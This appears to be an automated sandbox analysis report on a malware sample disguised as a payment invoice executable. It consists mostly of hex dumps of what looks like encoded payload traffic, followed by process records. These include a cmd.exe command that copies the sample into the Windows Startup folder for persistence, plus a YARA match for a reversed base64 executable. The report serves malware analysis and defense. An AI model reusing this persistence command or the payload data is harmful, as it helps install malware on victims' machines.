                                                        2023-02-22 07:36:37 UTC639INData Raw: 31 26 01 2d 22 23 be 03 2c 33 2b 23 30 1f 32 2d 30 be 0b 0f 13 23 f3 2b 0c 2d 0d 13 be 12 11 13 23 20 f7 21 f6 02 ff be 25 13 20 07 17 23 34 28 22 04 08 2b 2d f2 23 14 f6 30 03 be 33 f2 34 0f 03 ee 34 f0 12 21 21 20 f1 32 26 12 0b 0b f2 be 37 28 21 32 31 f7 34 37 0b 33 0c 06 0f 35 f4 08 1f 37 36 be 08 10 29 13 06 18 34 00 ee 22 14 24 2b f0 2a 32 36 f3 0b be 32 1f 30 25 23 32 be 2e 1f 30 1f 2b 32 23 30 31 be 0c 28 30 2a 37 00 2d 16 01 21 be 0c 0a 0c 2a 00 0e ee 26 26 f5 be 04 2b 37 2a 38 37 36 f4 29 f2 be 2f 36 16 17 16 10 f4 11 ef f6 be 12 0e 0e 17 f2 f6 ef 2a 35 35 be 31 28 10 17 09 04 2a 0a 2b 16 be 21 09 20 17 23 25 05 0a 10 ee be 25 00 23 17 10 f0 f7 31 30 36 be 20 0a 08 17 2b 34 12 f6 07 27 be 1f 16 ef 17 2a 0a f4 0c 08 31 be 03 36 14 17 17 ef 17 f3
                                                        Data Ascii: 1&-"#,3+#02-0#+-# !% #4("+-#0344!! 2&7(!21473576)4"$+*2620%#2.0+2#01(0*7-!*&&+7*876)/6*551(*+! #%%#106 +4'*16
                                                        2023-02-22 07:36:37 UTC643INData Raw: 02 ef 10 ff ee 21 18 13 18 2d 35 27 2c 08 be ff ff 15 07 ee 0f ef 2b 33 f6 25 14 18 2c 05 23 f5 0e 10 be 00 ef 2f 0c f6 24 ef 17 09 06 27 29 01 0d 29 11 15 32 37 be 09 ef 25 29 15 34 ef 1f 17 18 0c ff 23 15 0c f5 17 12 29 be 2f 0c 0c 1f 0e 2d 20 f4 17 2f be 16 0f 21 1f 27 23 33 0e 33 17 be 33 07 f4 1f 08 34 14 03 02 01 be 01 24 00 1f 24 03 0d f0 10 00 be 2e 12 28 1f 2d 21 14 37 20 0b be 38 0e 11 1f 21 24 22 06 20 14 be 10 11 ff 01 30 37 2e 32 2d 11 23 30 34 27 21 23 0e 30 2d 34 27 22 23 30 be 11 37 31 32 23 2b ec 11 23 21 33 30 27 32 37 ec 01 30 37 2e 32 2d 25 30 1f 2e 26 37 be 0c 22 26 1f 0a 1f 21 18 0a ee be 25 f0 35 1f 06 f5 ef 33 f7 2b be 0e 26 f1 1f 13 1f 37 08 f1 f5 be 0a 17 2c 1f ff 2e 15 14 31 11 be 25 03 2b 1f 18 2d 34 18 2c f6 be 23 25 20 1f 0f
                                                        Data Ascii: !-5',+3%,#/$'))27%)4#)/- /!'#3334$$.(-!7 8!$" 07.2-#04'!#0-4'"#0712#+#!30'2707.2-%0.&7"&!%53+&7,.1%+-4,#%
                                                        2023-02-22 07:36:37 UTC647INData Raw: 24 f2 23 22 f2 23 f1 f6 f7 f2 1f 21 ee f4 f3 1f f4 f6 22 ef f4 f7 ee f1 be 2b 1d 23 23 f4 f3 22 f3 21 ef f1 f6 f3 f0 f2 f0 f7 1f f7 f6 24 f7 f1 f1 f2 f0 f4 f7 f6 ee 23 20 22 f0 be 2b 1d f5 ee 24 f1 21 f3 ee f4 20 f4 23 f0 f2 23 24 f3 f6 21 22 21 1f 24 f6 20 f1 20 f3 ef ee f5 ee 21 be 2b 1d ef 24 20 f7 f2 1f 24 f0 ee f2 24 23 f2 f7 24 24 f6 f6 23 f7 21 23 21 ee f6 f7 ee f5 f4 f2 f7 f3 be 2b 1d f0 22 ef 23 23 f7 f1 f7 f6 f5 f0 f3 f2 20 f2 f7 f6 f4 1f 21 24 f0 f0 24 ef f0 20 f3 f6 f1 f5 ee be 2b 1d f7 f5 f2 f1 f7 ee 22 20 f3 f7 24 f5 f2 21 20 1f f7 f0 f2 ef f7 ee ee f5 ef f4 f0 f6 1f ef f2 22 be 2b 1d f7 21 20 21 ef f5 ef 20 f0 22 f5 ee f2 f5 f7 f6 f7 ef f0 f4 ee ee 20 ee f5 23 20 20 21 1f 22 f2 be 2b 1d f6 f5 20 f6 ef f0 21 22 21 f7 20 24 f2 f6 24 1f f6 24
                                                        Data Ascii: $#"#!"+##"!$# "+$! ##$!"!$ !+$ $$#$$#!#!+"## !$$ +" $! "+! ! " # !"+ !"! $$$
                                                        2023-02-22 07:36:37 UTC651INData Raw: 2c be 21 be 32 be 27 be 2d be 2c be 0e be 2d be 27 be 2c be 32 be 23 be 30 be be cf 24 be 27 be 2a be 23 be f8 be ed be ed be ed be be bf be cf 0a be 2d be 21 be 1f be 32 be 27 be 2d be 2c be be c9 04 be 27 be 2c be 22 be de be be d1 10 be 23 be 31 be 2d be 33 be 30 be 21 be 23 be ff be be cf 14 be 27 be 30 be 32 be 33 be 1f be 2a be de be be c9 ff be 2a be 2a be 2d be 21 be be cb 15 be 30 be 27 be 32 be 23 be de be be cf 0e be 30 be 2d be 21 be 23 be 31 be 31 be de be be cb 0b be 23 be 2b be 2d be 30 be 37 be be cd 0e be 30 be 2d be 32 be 23 be 21 be 32 be be c9 0d be 2e be 23 be 2c be de be be cd 0e be 30 be 2d be 21 be 23 be 31 be 31 be be cb 01 be 2a be 2d be 31 be 23 be de be be cb 06 be 1f be 2c be 22 be 2a be 23 be be cd 29 be 23 be 30 be 2c be 23
                                                        Data Ascii: ,!2'-,-',2#0$'*#-!2'-,',"#1-30!#'023***-!0'2#0-!#11#+-070-2#!2.#,0-!#11*-1#,"*#)#0,#
                                                        2023-02-22 07:36:37 UTC663INData Raw: bf be be fb c2 be be de e2 be 32 be 26 be 27 be 31 be ec be 11 be 2c be 1f be 2e be 12 be 2d be 05 be 30 be 27 be 22 be be be be be e4 e2 be 32 be 26 be 27 be 31 be ec be 12 be 30 be 1f be 37 be 0a be 1f be 30 be 25 be 23 be 07 be 21 be 2d be 2c be c0 be be be d2 e2 be 32 be 26 be 27 be 31 be ec be 07 be 21 be 2d be 2c be c2 be be be d6 e2 be 32 be 26 be 27 be 31 be ec be 0a be 2d be 21 be 29 be 23 be 22 be 81 c7 be be da e2 be 32 be 26 be 27 be 31 be ec be 02 be 30 be 1f be 35 be 05 be 30 be 27 be 22 be 83 c7 be be ea 2e be 30 be 2d be 25 be 30 be 23 be 31 be 31 be 00 be 1f be 30 be ef be ec be 0b be 2d be 22 be 27 be 24 be 27 be 23 be 30 be 31 be 85 c7 be be e0 e2 be 32 be 26 be 27 be 31 be ec be 0a be 2d be 21 be 1f be 2a be 27 be 38 be 1f be 20 be 2a
                                                        Data Ascii: 2&'1,.-0'"2&'1070%#!-,2&'1!-,2&'1-!)#"2&'1050'".0-%0#110-"'$'#012&'1-!*'8 *
                                                        2023-02-22 07:36:37 UTC679INData Raw: 1d 35 b5 94 cd 4b 7b 3b 10 61 48 55 e2 fa 04 6d 65 32 c1 a8 95 4f 51 9b c0 35 05 bd 7b b3 73 79 aa 54 fb b6 f7 65 4c 73 5e 58 8b 46 84 49 99 93 c3 a1 7a c4 05 f6 3d 4d 07 b9 9d 52 ee 71 25 df ef 3c 0b 5a 9d b2 90 e0 a1 66 18 33 54 0d 9c b3 4c dd f2 9c a4 28 81 08 4c ec c3 db 6d 3d e6 29 09 8a c1 b6 95 d8 58 e7 fb b6 c2 e1 22 7a a0 22 1f 32 ad dd 61 bf eb ba 01 e2 af 88 ef 6f a2 1e 56 e9 f9 b6 26 a0 82 92 20 63 f9 89 5d 50 75 c5 5f 93 2d 65 16 7f a1 dc 60 a8 9e 20 2e c9 29 2d e0 1e 6d 0b a3 4f e9 a5 d7 6e 6e 99 43 8f 4d d4 f8 ef e1 df b4 c5 a4 c9 1b 97 09 e9 ff 1e e4 6e e5 c0 29 2d 5b ae fe 38 a9 2e 73 a0 b6 e4 e2 fb 8e d8 43 46 53 4d c4 3a a6 24 23 d5 d4 e4 9a 58 f2 91 3b b7 91 49 39 cb 91 f0 f6 0f 43 d1 08 42 58 3f ab 14 5b 46 3f 4c f4 38 23 52 a4 a7 ab
                                                        Data Ascii: 5K{;aHUme2OQ5{syTeLs^XFIz=MRq%<Zf3TL(Lm=)X"z"2aoV& c]Pu_-e` .)-mOnnCMn)-[8.sCFSM:$#X;I9CBX?[F?L8#R
                                                        2023-02-22 07:36:37 UTC695INData Raw: 42 24 6a 94 41 7d 71 88 f4 93 15 8e b9 0c d1 e7 ff d7 2e 8e b5 ea 43 2e 7a 0d fb 5b b0 e9 1c 7f 02 01 37 a4 c0 35 b1 2f 69 fb 2f 75 ea 86 0a 0a 16 1b 36 7f 81 3d 59 69 42 cb 42 32 b6 2a 64 7b 63 f2 e8 16 e3 c4 ae 91 75 2c 33 db a5 9a dd a1 30 63 03 79 c8 5e 27 5a 4e f0 dd c9 fe c5 77 a1 54 b4 9c b4 69 eb a0 81 2c 45 a4 08 4a 3f de 50 58 1c af d7 30 ef ee 6e 69 d4 c8 2d c9 ed ec f2 79 2d ca 18 06 fd aa 56 3f 83 2b e0 fa 4c 56 c2 3a 1e fb bd e3 0d 09 28 74 b4 29 8e 7b 73 56 07 87 f3 57 c5 ae 16 48 cb 32 96 0a 75 02 bd 49 19 1b 11 59 59 4b 7b fe 0b ad 76 27 4b cf 8c 06 c6 d1 ba 1a 91 ff 4f 51 08 e5 cc 01 65 b4 b6 3a 3a 80 70 4e 01 7c ae ba 8c 70 e6 87 8f 74 15 a3 76 3e c6 44 ab 62 42 c3 c7 c7 83 a2 f3 fe fe 1d e2 5b 29 bd 82 5b 3e d1 9b 60 08 f7 46 a4 28 ec
                                                        Data Ascii: B$jA}q.C.z[75/i/u6=YiBB2*d{cu,30cy^'ZNwTi,EJ?PX0ni-y-V?+LV:(t){sVWH2uIYYK{v'KOQe::pN|ptv>DbB[)[>`F(
                                                        2023-02-22 07:36:37 UTC711INData Raw: 39 da 4c 67 36 53 2f be de 40 f1 24 36 22 28 6a af c3 f7 5c 40 4f 07 52 54 e2 89 c7 be 84 1e d5 c4 ac e2 e0 86 12 a9 a6 b4 d2 d0 17 36 a5 15 58 cf 65 6b 1d a3 04 2d 6a 17 a0 d7 7c 17 57 f2 52 ce 4b 6b 69 c9 8a 57 15 97 ec 98 0e 6a b9 03 67 44 47 94 dc b6 bd 88 14 f3 4d ab 5c 40 79 09 81 d2 2a 66 e5 c6 f1 fb e8 3b 7f da fd b5 a8 c9 c1 44 86 2a 5d 9b be 42 77 7f 87 8d 42 7e 5d a5 9e f5 b9 6a af 5c f5 62 47 43 26 8a 06 af d1 0d 34 cc 2d 67 8a ea 25 05 fd 04 4f 87 49 aa 98 20 80 68 67 65 13 d7 5a 3c 57 c9 4e b3 61 d7 cb 44 ed 1b 0d 14 08 1a 06 c5 77 a8 05 4c ed ba 8a 18 f5 c9 f7 c3 ec d3 7f 09 79 b0 53 dd 6c b9 34 ca 9a ec b3 25 04 b3 50 c2 56 29 d5 0f 4a 66 c4 0b 61 4b 75 dd 0d 30 38 f8 e1 d5 4f 78 04 cc 27 5c 33 e6 e7 c0 c7 e0 f2 cf a1 e4 54 d5 ce a9 d9 4a
                                                        Data Ascii: 9Lg6S/@$6"(j\@ORT6Xek-j|WRKkiWjgDGM\@y*f;D*]BwB~]j\bGC&4-g%OI hgeZ<WNaDwLySl4%PV)JfaKu08Ox'\3TJ
                                                        2023-02-22 07:36:37 UTC727INData Raw: 86 75 8e 10 52 1a f9 1d 24 d1 8e e4 2f 37 e5 74 c3 08 39 76 35 46 16 61 74 64 5b 40 45 f7 16 03 e8 6e 03 b1 81 55 64 d8 be 4b 6c 12 41 a2 52 6f af 52 8c af 99 9c c8 9a d2 17 5c d1 69 8b 25 db c1 56 69 39 85 ad b4 44 b9 2c 77 d6 61 65 68 b9 c6 ab 17 d7 ea 72 23 fe 4d 55 7b 46 a8 88 1a f3 8a 2d 4f 4e ea 9b be 57 64 32 be 7a 52 a2 69 50 7d f8 f3 3f fa fb 77 fd f7 f1 25 12 87 51 68 bb dd e8 78 85 3b 49 16 07 71 fa 20 87 b6 e0 81 8e 10 07 6d ce 8b 6f 7f 20 07 32 ec b8 79 b7 82 f7 7f dc d9 57 d8 d4 e1 2c 22 c3 2c 89 ac db 5c ff f2 60 1b ca 29 37 09 27 29 21 c7 60 5d f9 ed bf f8 53 aa cf 21 8a f3 1f 38 d3 ac c4 6c ba 1a c7 26 36 49 ed 9a 7b c4 ff fb cf 43 63 63 48 9a a7 b5 9a 59 c5 65 31 c9 af 2c 1b 7a 4b 4b 20 72 eb b1 6f 5b e4 0b 2e 76 ef b7 c0 f4 98 67 ba 25
                                                        Data Ascii: uR$/7t9v5Fatd[@EnUdKlARoR\i%Vi9D,waehr#MU{F-ONWd2zRiP}?w%Qhx;Iq mo 2yW,",\`)7')!`]S!8l&6I{CccHYe1,zKK ro[.vg%
                                                        2023-02-22 07:36:37 UTC743INData Raw: ec 5f 57 27 93 8e cc c0 da 29 24 b3 b3 52 67 55 59 6d 9c 7e b7 aa 0f 3d 86 62 16 af c7 53 50 ef cf 2d 5b 4c f5 58 ed a6 ef a9 f6 29 f8 03 00 bf 50 da c4 7f 11 fc 08 89 fc 1f 96 28 85 69 01 cc f7 f7 dd 0e 33 26 50 f0 de 2a f6 5d 87 bb ab a0 97 6d 0d 55 d9 53 31 c9 f6 66 58 ba b9 b0 7a d3 62 22 40 49 65 0e 48 70 1d b0 30 36 d7 bb 74 df bf 72 04 8b 7d 2e 87 e4 ea d5 b3 71 2e 89 06 2b 7c fb 4f 0b 85 d0 d9 95 f2 22 7d 73 c5 e0 b8 8c 35 f3 ad d8 73 55 1b 9a c6 a8 01 f2 40 83 d1 6a 5a 98 71 40 c1 3d a2 64 2b be 80 1a 8e 56 f0 01 3e 37 fe 7c 50 43 c7 1e b1 f3 05 4b 14 76 dc 14 02 d0 e2 72 7a af f6 cc 54 08 04 51 e8 e3 e9 f9 42 63 07 44 bc d1 6c 28 4f 19 68 b1 35 bf 4a 50 f5 11 c8 d3 13 03 e0 d6 bd 12 f1 7f cf 6a 8b c0 a8 42 a4 e1 be 7b d9 b5 c5 3d 67 5b 40 e1 f3
                                                        Data Ascii: _W')$RgUYm~=bSP-[LX)P(i3&P*]mUS1fXzb"@IeHp06tr}.q.+|O"}s5sU@jZq@=d+V>7|PCKvrzTQBcDl(Oh5JPjB{=g[@
                                                        2023-02-22 07:36:37 UTC759INData Raw: 28 83 d9 3a 33 da 8d 40 28 c8 a5 11 06 ed f3 ed 3b 48 20 ac 8d ed 49 2c 9f 82 4d b2 cb 2e fd 73 7f ab 39 44 24 77 80 3c 60 f8 2c b3 d6 5f 6c e5 26 a8 9c 7b e3 1b ae 74 a3 56 dc a3 62 1c b6 63 ec 60 e2 7b fe bc c0 03 70 ad ce 44 ce f0 76 d6 10 71 08 27 bb a4 d4 ed 32 87 85 43 53 08 f6 01 75 f4 2b cd 36 59 62 42 c4 40 99 0d d4 d5 4b 72 7f 1a b8 5b e1 9b ad e1 0d d9 cf bd e5 b5 67 80 91 24 b8 4a a2 fa 2e 73 22 60 82 fa 25 9d d9 ac 6a ca 8d 25 6a 4b e3 6c e2 5d 7f 3a 9d ff 7e b0 c6 94 ef 1b 64 bf 32 1e e4 9e f2 4f 2d 07 64 89 e3 4c 19 89 d4 fe ff ad 12 08 18 21 c6 96 d8 9f f7 b7 93 25 28 bb 51 1d 93 10 1a d4 41 0f db c9 63 59 d3 32 f0 16 cd 82 60 23 bd 7b 25 40 39 59 cb 11 ce d9 37 e3 41 ec 5a 99 39 82 97 ce 65 74 3e 74 e4 59 a3 c5 84 11 00 be 0b 89 06 16 b4
                                                        Data Ascii: (:3@(;H I,M.s9D$w<`,_l&{tVbc`{pDvq'2CSu+6YbB@Kr[g$J.s"`%j%jKl]:~d2O-dL!%(QAcY2`#{%@9Y7AZ9et>tY
                                                        2023-02-22 07:36:37 UTC775INData Raw: 89 80 18 31 6b d4 01 e2 f1 93 0a 35 df 03 b3 78 77 4b 28 2b 3d 29 22 22 df 5c da b8 5c 17 34 78 ec b7 36 6a 1d 3e 9d 8f df 0c f3 e8 98 58 06 87 24 c8 c7 a7 7d ac 6c 61 03 fc a8 ae 6b 8c cb fd 9a e6 36 f1 b0 4a 4a fc 98 e1 f3 a6 f5 0d 2c 88 a2 43 11 98 be 2c 8a 0a fa ab 39 d1 cf ff f8 0c fc 28 66 25 a1 f1 cc 6b 01 79 97 56 2a 0a 0b 0e 46 ea 7e 2d b9 72 6b ee 1b ce 10 28 36 44 24 2d 41 f2 2f 21 7b 67 eb 76 62 85 80 73 06 73 e5 69 0d 83 ab b4 ce cf 82 27 71 89 ad a5 c7 f0 f8 09 0b 58 21 c4 c1 80 97 84 20 76 01 2f 8a 32 32 2e ef ef 1f bd a2 ca 42 91 1a 8b 34 4b bb f2 ad 97 d4 1c 40 8d 65 c3 04 b5 58 89 a8 19 c9 c7 af b5 1a f1 78 64 d5 c9 f2 f9 3f bf 97 2c 84 50 aa f8 81 59 ae ab 9e 16 63 0c 1f 26 cc 5a 6f d7 20 48 64 61 0c a7 1d 7f 82 5d 47 75 53 d4 c6 7f ae
                                                        Data Ascii: 1k5xwK(+=)""\\4x6j>X$}lak6JJ,C,9(f%kyV*F~-rk(6D$-A/!{gvbssi'qX! v/22.B4K@eXxd?,PYc&Zo Hda]GuS
                                                        2023-02-22 07:36:37 UTC791INData Raw: 66 ff 1e 4e ce ce bc 83 22 7f 0f 6b 4b 86 d1 13 0e b6 c3 03 18 b4 41 76 a9 01 0c f1 59 f3 12 d3 56 c8 b8 09 2e d1 05 24 cd db ad ff 7c ec a0 f8 74 7c 14 4b 3a 0c 57 1e fe 6c 25 53 74 79 aa f3 06 37 22 64 bc 33 e8 ac 71 74 17 f9 a6 7c d7 f3 b0 e3 4c 1c 64 9e c5 93 3b 37 4c 24 74 54 60 26 ec 21 45 b6 7a d0 c6 b5 30 89 c1 08 d1 76 2d 48 f5 e6 47 8c 15 1f 12 1d 32 23 b3 3c e6 44 06 5a 88 9e ea d4 5c 47 bc e0 fb 0b 33 83 95 86 9c 46 5f c1 60 bb 30 71 0d 67 04 ab e0 eb 0f ef 9b b1 73 22 1a 55 e1 08 1c ef 08 5c a5 01 17 af 46 41 5b f0 73 1b 2d b7 7c e5 37 d5 79 cf d9 16 59 f2 41 b7 1e 06 88 f2 05 33 c6 67 dd 78 34 ec 31 00 54 75 96 d9 44 b7 89 f5 34 10 fe 1c 23 12 bc 4e 96 b6 70 cd 50 21 ac 3c 56 5a 31 67 85 dd 36 9c 8e 73 c4 86 d3 b6 7b b2 e7 be 02 6a 55 a7 39
                                                        Data Ascii: fN"kKAvYV.$|t|K:Wl%Sty7"d3qt|Ld;7L$tT`&!Ez0v-HG2#<DZ\G3F_`0qgs"U\FA[s-|7yYA3gx41TuD4#NpP!<VZ1g6s{jU9
                                                        2023-02-22 07:36:37 UTC807INData Raw: 20 d1 b7 34 40 82 75 3b d9 01 c3 16 3f 6f 67 ce 09 53 bf a3 0d e1 73 00 b2 f0 0a 7b c9 13 6e b7 55 a6 03 5c 67 f1 1c 0f 5a cf f6 c0 6d 74 76 72 36 21 ad 23 f6 cc 58 7b 16 3b 1d 19 39 e0 d5 db 6f 2f 8c 61 a5 3d 2c 3d 61 25 8b 70 f2 8b 50 56 44 e3 ab 93 e7 c6 96 fd 1d ba c8 ec cc 7f de 92 2c 33 6b 34 3c 81 5a a4 ec 70 54 48 07 ac e2 5f a1 47 54 cb fd 96 f6 32 df 8a 91 0d 76 18 df 52 ff 1b 4b 5c d4 43 fe 5d d5 c9 3d a0 8c db c2 ea 71 ad 7d 14 cf 42 cb ce ce c1 81 4b 6c be ea 6d 0f f1 a9 f7 18 18 76 a4 d1 66 2c 1a d5 bc 66 dd fb c9 07 c1 ef 45 f7 f3 fc d0 dd a7 8e cb 76 57 11 e5 51 15 f4 3b cb 3e c6 57 09 47 bb 91 85 eb 44 e3 8b b5 01 ff 52 d4 4a 8f ff 85 f7 c4 42 29 9a 43 88 a5 17 2f 0b 27 41 d0 99 0f 7f 33 e3 32 f3 46 55 80 e0 65 b6 02 74 0a d6 fa 07 df 03
                                                        Data Ascii: 4@u;?ogSs{nU\gZmtvr6!#X{;9o/a=,=a%pPVD,3k4<ZpTH_GT2vRK\C]=q}BKlmvf,fEvWQ;>WGDRJB)C/'A32FUet
                                                        2023-02-22 07:36:37 UTC823INData Raw: c1 4a 25 a3 b9 55 2a 6b 98 cf b3 07 cd 8c 0d 78 87 a4 58 8f f7 10 c5 a0 ab a7 ba 22 c3 96 c3 c5 7b 54 8c 11 b5 d8 27 b0 58 0a b0 f6 fe 5f 96 f9 dd dd ce 5c f9 68 28 23 a1 6e 09 d5 be 7d cb 04 e5 76 bc 2d 36 56 84 33 be 65 4d 6a 21 30 f2 18 09 84 f5 4c 4f ae 1e 9d f2 12 f9 ab 71 ba 51 b5 9c 44 39 25 07 ee c2 6d 2c 11 36 d5 f9 76 fb 3e 74 91 d9 18 fe 3f b9 02 65 94 bf 98 fd a2 4f 87 9d 8d f4 50 a5 05 a3 a2 41 e7 8e d1 65 59 3f 27 3c c0 27 7e 1b e7 67 b1 34 e8 e7 ac 49 5a e4 3a fb 91 26 b3 2f 07 a7 ff 86 2e 8b 1b f4 ba 76 27 4b 5f 4f 46 ce 4c c1 34 18 a2 1a 62 b5 c9 c5 f3 2f 53 73 bf bb cb 17 30 76 1f e2 9b 95 3d 21 6f 23 37 2e 9f 23 8c 57 d3 de 61 f7 15 7b f8 47 48 21 f8 36 e1 15 bc c9 dd 1c c6 b3 84 ac 23 ca e5 98 7a 7d fc 0d 33 4d 56 05 fa 76 24 19 71 b9
                                                        Data Ascii: J%U*kxX"{T'X_\h(#n}v-6V3eMj!0LOqQD9%m,6v>t?eOPAeY?'<'~g4IZ:&/.v'K_OFL4b/Ss0v=!o#7.#Wa{GH!6#z}3MVv$q
                                                        2023-02-22 07:36:37 UTC839INData Raw: f9 0d 6b ee 0c b6 bc 1d 09 ea aa d7 9f cf 55 44 0d dd b2 ec d5 a1 10 dd 25 54 ed 97 1a dc 3b 7b 5b 04 4b fc c9 20 6d 1d 13 d4 01 85 4b 1d d7 cb d2 c3 a4 79 e1 87 23 26 aa df 7d e4 2f c2 e5 88 27 ce 13 12 f7 44 e5 70 0f e6 20 dd 78 89 f2 d8 7b 8a 19 d3 19 04 2b 2a 3e 07 3c 78 92 d3 71 bf 2a c5 03 2e b4 4d 1e ca 7b 22 10 03 1c 72 1b e5 5e df 6c 07 73 7c f8 dc 6d 39 03 70 54 e8 d1 7a a2 c6 ca c2 a1 82 81 fb fc 50 7e 9b 5d 16 82 bd 71 89 d9 f1 3b 58 72 97 d6 aa 94 55 86 80 15 a2 9c e6 e7 c1 27 5e 1b 2c a8 c8 19 e6 81 33 9f 65 ca ef 68 42 5e 33 94 79 0f 83 62 66 34 f0 9a 07 d5 38 07 a5 8b 7d a8 27 85 33 de 3a 73 9f 6f 6e 7e d6 29 0a 10 9f 46 d9 b4 2f 0e 28 14 44 f8 6b 11 7e 06 93 27 e1 92 af a2 bd 1a fe 91 a5 1b 4b 0f f4 e9 e6 97 03 00 1d f3 4b fc c3 c9 e7 c5
                                                        Data Ascii: kUD%T;{[K mKy#&}/'Dp x{+*><xq*.M{"r^ls|m9pTzP~]q;XrU'^,3ehB^3ybf48}'3:son~)F/(Dk~'KK
                                                        2023-02-22 07:36:37 UTC855INData Raw: 45 a3 c3 04 af 0c d1 98 a7 43 76 63 9c 03 a1 4c ac 92 3e 1e 63 b4 a8 5f 05 bf 3a 14 4a c9 d1 09 fb 4a e6 96 33 9a bf f6 e5 8e dc e1 43 c7 c0 0a 8b 4c 86 d0 ac 37 06 24 56 56 9e 21 6e 60 3e 7f 5f 4b 69 4d 06 b2 e3 a2 73 d2 94 d0 1c 9f f3 5f a4 8d 1a e2 71 95 52 7a fb 95 e1 90 92 35 fe 9f 16 11 13 72 82 d9 e5 40 f8 72 79 9b e3 b4 14 4a df 6a e8 eb 4f 3e 53 ff 01 7a 0d 93 a9 29 82 30 23 40 ff 1c c2 f5 d5 02 3a 77 82 c1 77 fa d3 ca ba 27 82 40 88 2f 47 20 4d 81 fb d3 99 aa 39 9d 87 04 82 d5 25 4a 3f a7 49 47 df a1 2d 7e d0 13 f3 57 f6 e5 56 ea ee d5 72 68 47 36 c3 f9 74 f6 b4 1a 04 af b8 7c 9d c2 c6 cf c4 83 f4 a6 d6 8c ce e8 67 7b e2 fc 31 f4 ab d7 e2 41 ee c9 9c 25 b9 1c 9f ed c5 b7 cc 38 f6 ff d0 d7 a8 42 41 a0 53 a2 2f 1f b8 c5 93 34 33 07 1b 1e f7 57 92
                                                        Data Ascii: ECvcL>c_:JJ3CL7$VV!n`>_KiMs_qRz5r@ryJjO>Sz)0#@:ww'@/G M9%J?IG-~WVrhG6t|g{1A%8BAS/43W
                                                        2023-02-22 07:36:37 UTC871INData Raw: b9 b8 b7 bb bd 88 bb ba bd b0 42 b0 b5 7e b3 90 84 88 8b 8b 8d 8c 8b a8 9e 80 76 84 85 b5 84 b0 b7 98 8f 8f 9d b1 9c b8 82 90 8f 90 95 60 94 92 46 68 5f 6c 6d 59 6c 7a 76 60 6b 67 65 5b 64 72 69 78 7b 76 7d 74 7b 7a 7b 70 6f 6e 75 3e 73 50 44 48 47 4b 4d 78 4b 4a 4d 40 b2 40 45 7d 43 42 59 58 aa 5c 5d 67 5c 4a 71 50 5b 57 55 6c 54 42 2e 28 2f 2d 2d dd 2c 18 39 20 33 27 25 0a 24 10 16 38 2f 2f 3d 2c 3c 2a 31 30 15 2e 35 c5 33 32 09 08 0b 0b 0d f8 0c 28 1f 00 03 04 05 3c 04 20 01 18 31 1c 1d 10 1c 28 2f 10 1b 17 15 3d 14 12 c6 e8 e3 ea ed ec eb ea e1 e0 f3 e4 e5 d1 e4 f2 e1 f8 0a fa fd 0d fc c8 e9 f0 e3 f7 f5 da f4 c0 e6 c8 bf bf cd dc cc da c1 c0 32 be c5 3d c3 c2 d9 d8 ed dc dd ea dc da c6 d0 22 d0 d5 ed d3 c2 8d a8 9f 9f ad 85 ac 88 7f a0 a7 a4 a5 95 a4
                                                        Data Ascii: B~v`Fh_lmYlzv`kge[drix{v}t{z{ponu>sPDHGKMxKJM@@E}CBYX\]g\JqP[WUlTB.(/--,9 3'%$8//=,<*10.532(< 1(/=2="


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:36:15
                                                        Start date:22/02/2023
                                                        Path:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Imagebase:0x350000
                                                        File size:37376 bytes
                                                        MD5 hash:D6460E1A62BFB5366FFF5959B99BBEDE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000000.00000002.333839662.00000000026C8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                        Reputation:low

                                                        General

                                                        Target ID:1
                                                        Start time:08:36:21
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:2
                                                        Start time:08:36:21
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:3
                                                        Start time:08:36:23
                                                        Start date:22/02/2023
                                                        Path:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Imagebase:0x90000
                                                        File size:37376 bytes
                                                        MD5 hash:D6460E1A62BFB5366FFF5959B99BBEDE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        General

                                                        Target ID:4
                                                        Start time:08:36:23
                                                        Start date:22/02/2023
                                                        Path:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        Imagebase:0xdc0000
                                                        File size:37376 bytes
                                                        MD5 hash:D6460E1A62BFB5366FFF5959B99BBEDE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
